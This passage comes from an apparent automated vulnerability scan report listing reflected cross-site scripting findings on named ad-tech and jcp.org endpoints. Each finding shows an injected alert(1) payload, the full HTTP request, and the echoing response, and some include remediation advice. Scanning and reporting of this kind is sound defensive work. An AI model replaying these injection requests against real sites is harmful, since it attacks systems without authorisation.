document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=20&Z=300x250&s=2298003&r=1&_salt=1775927586&u=http%3A%2F%2Fwww.tmz.com%2F&u=http://www.tmz.com/a19be';alert(1)//63b277fa96a">
...[SNIP]...
|
4.116. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://ibmwebsphere.tt.omtrdc.net |
| Path: |
/m2/ibmwebsphere/mbox/standard |
Issue detail
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 36dcc<script>alert(1)</script>39a607c6ef6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/ibmwebsphere/mbox/standard?mboxHost=www-142.ibm.com&mboxSession=1316221012167-554408&mboxPage=1316221012167-554408&screenHeight=1200&screenWidth=1920&browserWidth=1106&browserHeight=789&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=2&mbox=eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6&mboxId=0&mboxTime=1316203014547&mboxURL=http%3A%2F%2Fwww-142.ibm.com%2Fsoftware%2Fproducts%2Fus%2Fen%2Fsearch%3Fpgel%3Dlnav%26hppcode%3D1%26st%3Dnew%26q1%3Dxss&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=40 HTTP/1.1
Host: ibmwebsphere.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www-142.ibm.com/software/products/us/en/search?pgel=lnav&hppcode=1&st=new&q1=xss
Cookie: mboxSession=1316221012167-554408; mboxPC=1316221012167-554408.19
|
Response
HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1316221012167-554408.19; Domain=ibmwebsphere.tt.omtrdc.net; Expires=Fri, 30-Sep-2011 19:56:52 GMT; Path=/m2/ibmwebsphere
Content-Type: text/javascript
Content-Length: 216
Date: Fri, 16 Sep 2011 19:56:52 GMT
Server: Test & Target
mboxFactories.get('default').get('eps_bykeyword_search36dcc<script>alert(1)</script>39a607c6ef6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1316221012167-554408.19"); |
4.117. http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://imp.fetchback.com |
| Path: |
/serve/fb/adtag.js |
Issue detail
The value of the clicktracking request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c993b"-alert(1)-"79e3f04e7ed was submitted in the clicktracking parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220749_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:29 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575
document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2Cc993b"-alert(1)-"79e3f04e7ed' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...
|
4.118. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://imp.fetchback.com |
| Path: |
/serve/fb/adtag.js |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5581f"-alert(1)-"11bcd5d0490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1 HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: uid=1_1316220751_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:31 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 578
document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaS
...[SNIP]...
DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C&5581f"-alert(1)-"11bcd5d0490=1' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+">
...[SNIP]...
|
4.119. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://imp.fetchback.com |
| Path: |
/serve/fb/adtag.js |
Issue detail
The value of the type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95638"-alert(1)-"4bc29a81874 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /serve/fb/adtag.js?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9%2EOPbky%2EWK36vt%2DDbJ4zXaP8GBV2Ls%2DOyN%2D%2EpY5Bn3F79yHkEiVbfj5Ss8xDrpVCvk6iqWcN7K9BJKZacyuwiZPNM6RrtfkM0No2rb28yytNZmW3emamrrDQ6KVYI%3D%2C HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1
|
Response
HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:27 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1316220747_1316220738792:7409124710126868; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sat, 17 Sep 2011 00:52:27 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 575
document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68326&type=mrect95638"-alert(1)-"4bc29a81874&clicktracking=http%3A%2F%2Fad%2Eyieldmanager%2Ecom%2Fclk%3F3%2CeAGljc0OgjAQhF%2DIgNsiFBsP1UYDUpWkROFmyp9RgkaSKk%2DvAvEFnMs3m83MAKbgoQJIcSIKO%2DA6UwoYuXaWuyQjxoRSijF4DnKREa0bxgIR%2DZp3ZqpZrw3fB%2DVgWU9
...[SNIP]...
|
4.120. http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://jcp.org |
| Path: |
/en/jsr/all |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 284c1"><script>alert(1)</script>451b1e39851 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1 HTTP/1.1
Host: jcp.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://jcp.org/aboutJava/communityprocess/maintenance/jsr234/index2.html
|
Response
HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Fri, 16 Sep 2011 19:57:07 GMT
Content-type: text/html;charset=ISO-8859-1
Content-Length: 411049
<!-- ** BEGIN: header.jsp ** //-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
...[SNIP]...
<input name="uri" value="/en/jsr/all?284c1"><script>alert(1)</script>451b1e39851=1" type="hidden">
...[SNIP]...
|
4.121. http://js.revsci.net/gateway/gw.js [ali parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the ali request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea4cb'%3balert(1)//4b86e2820c was submitted in the ali parameter. This input was echoed as ea4cb';alert(1)//4b86e2820c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023ea4cb'%3balert(1)//4b86e2820c&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5217
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
);
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023ea4cb';alert(1)//4b86e2820c');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
|
4.122. http://js.revsci.net/gateway/gw.js [cid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe30b'%3balert(1)//803e9c23130 was submitted in the cid parameter. This input was echoed as fe30b';alert(1)//803e9c23130 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627fe30b'%3balert(1)//803e9c23130&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:48 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:48 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:48 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627fe30b';alert(1)//803e9c23130');
A10868.DM_addEncToLoc('p', '99');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
|
4.123. http://js.revsci.net/gateway/gw.js [clen parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the clen request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31fab'%3balert(1)//0fad37552c8 was submitted in the clen parameter. This input was echoed as 31fab';alert(1)//0fad37552c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=32831fab'%3balert(1)//0fad37552c8&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:35 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:35 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:34 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
csid);
if(window[rsi_csid])window[rsi_csid].rsi_ral(1);else rsi_ral(1);
if(window[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','32831fab';alert(1)//0fad37552c8');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '261950');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '332902
...[SNIP]...
|
4.124. http://js.revsci.net/gateway/gw.js [csid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 7ec98<script>alert(1)</script>b1efe77bc87 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?auto=t&csid=A108687ec98<script>alert(1)</script>b1efe77bc87&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:29 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:29 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:29 GMT
Content-Length: 128
/*
* JavaScript include error:
* The customer code "A108687EC98<SCRIPT>ALERT(1)</SCRIPT>B1EFE77BC87" was not recognized.
*/
|
4.125. http://js.revsci.net/gateway/gw.js [p parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91982'%3balert(1)//e1948788f29 was submitted in the p parameter. This input was echoed as 91982';alert(1)//e1948788f29 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=9991982'%3balert(1)//e1948788f29&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:50 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:50 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:50 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da
...[SNIP]...
');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '9991982';alert(1)//e1948788f29');
A10868.DM_addEncToLoc('ref', 'http://www.tmz.com/');
if(window[rsi_csid])window[rsi_csid].DM_tag();else DM_tag();
|
4.126. http://js.revsci.net/gateway/gw.js [pid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b443'%3balert(1)//a35e45272ee was submitted in the pid parameter. This input was echoed as 5b443';alert(1)//a35e45272ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=2619505b443'%3balert(1)//a35e45272ee&pli=3449146&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:41 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:41 GMT
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:41 GMT
Content-Length: 5217
//AG 13.0.0-21371 CM-1 (2011-09-16 13:59:30 UTC)
var rsi_now= new Date();
var rsi_csid= 'A10868';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...
ow[rsi_csid])window[rsi_csid].rsi_r();else rsi_r();
A10868.DM_addEncToLoc('ver', '2.2');
A10868.DM_addEncToLoc('clen','328');
A10868.DM_addEncToLoc('vid', '27200');
A10868.DM_addEncToLoc('pid', '2619505b443';alert(1)//a35e45272ee');
A10868.DM_addEncToLoc('pli', '3449146');
A10868.DM_addEncToLoc('sid', '2298003');
A10868.DM_addEncToLoc('ali', '3329023');
A10868.DM_addEncToLoc('cid', '10288627');
A10868.DM_addEncToLoc('p', '99
...[SNIP]...
|
4.127. http://js.revsci.net/gateway/gw.js [pli parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://js.revsci.net |
| Path: |
/gateway/gw.js |
Issue detail
The value of the pli request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61d4e'%3balert(1)//bb7df706fb4 was submitted in the pli parameter. This input was echoed as 61d4e';alert(1)//bb7df706fb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?auto=t&csid=A10868&ver=2.2&clen=328&vid=27200&pid=261950&pli=344914661d4e'%3balert(1)//bb7df706fb4&sid=2298003&ali=3329023&cid=10288627&p=99&ref=http%3A//www.tmz.com/& HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 17 Sep 2011 00:52:42 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 18 Sep 2011 00:52:42 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:41 GMT
Content-Length: 5218
//AG-develop 12.7.1-110 (2011-08-15 17:17:21 UTC)
var rsi_now= new Date();
